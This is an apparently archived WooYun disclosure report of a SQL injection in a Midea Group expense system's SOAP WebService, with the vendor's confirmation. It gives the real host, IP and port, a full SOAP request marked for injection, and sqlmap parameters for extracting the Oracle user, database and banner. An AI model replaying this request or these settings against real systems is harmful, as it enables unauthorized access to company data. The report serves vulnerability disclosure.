当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0181880

漏洞标题:美的集团某系统SQL注入漏洞

相关厂商:midea.com

漏洞作者: peer

提交时间:2016-03-07 16:48

修复时间:2016-04-21 16:49

公开时间:2016-04-21 16:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-07: 厂商已经确认,细节仅向厂商公开
2016-03-17: 细节向核心白帽子及相关领域专家公开
2016-03-27: 细节向普通白帽子公开
2016-04-06: 细节向实习白帽子公开
2016-04-21: 细节向公众公开

简要描述:

美的某系统的SQL注入

详细说明:

http://jders.midea.com.cn/ 美的集团网上报帐系统
在8001端口存在一个WebService接口:http://jders.midea.com.cn:8001/ERSService.asmx?WSDL
其中的searchUser方法存在注入(其它方法也存在注入,只使用这个方法去测试了)

1.jpg


2.jpg


使用BurpSuite拦包测试(使用CDATA来保证请求不需要转义):

3.jpg


将数据包复制到txt文件注入位置加个“*”号,使用sqlmap跑下:
数据包:

POST /ERSService.asmx HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://tempuri.org/searchUsers"
Content-Length: 434
Host: 202.104.30.149:8001
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:searchUsers>
         <!--Optional:-->
         <tem:pt_id><![CDATA[1*]]></tem:pt_id>
         <!--Optional:-->
         <tem:username>aaaa</tem:username>
      </tem:searchUsers>
   </soapenv:Body>
</soapenv:Envelope>


SQLMap参数:

-r C:/a.txt --technique=U --dbms=oracle --union-cols="2" --prefix="'" --suffix="--" --current-user --current-db --banner


4.jpg


5.jpg

漏洞证明:

4.jpg


5.jpg

修复方案:

过滤所有接口获取的参数或接口添加权限访问

版权声明:转载请注明来源 peer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-07 16:49

厂商回复:

确认漏洞存在,修修补补去。

最新状态:

暂无